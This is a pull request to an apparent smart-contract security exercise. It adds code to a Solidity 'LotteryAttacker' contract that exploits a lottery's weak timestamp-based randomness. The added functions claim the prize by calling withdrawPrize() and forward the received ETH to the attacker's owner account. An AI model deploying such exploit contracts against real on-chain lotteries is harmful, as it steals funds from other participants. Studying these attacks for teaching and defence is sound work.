### PR TITLE
Fixed bugged to claim the lottery rewards

### DIFF
--- a/contracts/weak-randomness/LotteryAttacker.sol
+++ b/contracts/weak-randomness/LotteryAttacker.sol
@@ -22,4 +22,16 @@ contract LotteryAttacker is Ownable {
   function getWinningNumber() private view returns (uint8) {
     return uint8(uint256(keccak256(abi.encodePacked(block.timestamp))) % 254) + 1;
   }
+  
+  // The winner of the lottery will be the address of this contract, thus, this contract needs to call the withdrawPrize() to claim the reward
+  function claimReward() external onlyOwner {
+    lottery.withdrawPrize();
+  }
+
+  // This contract must be able to receive ETH, asap as it receives some ETH, forwards it to the contract's owner (Attacker Account)
+  receive() external payable {
+    // Immediately send the ETHs to the attacker's account
+    payable(owner()).sendValue(address(this).balance);
+  }
+  
 }


### PR DESCRIPTION
Previously there was no way to claim the rewards of the lottery. The winner will be set to the attacker contract address, hence, if the attacker contract doesn't call the withdrawPrize() function, the funds will be stuck forever (unless there is another winner, but that is a different scenario...)
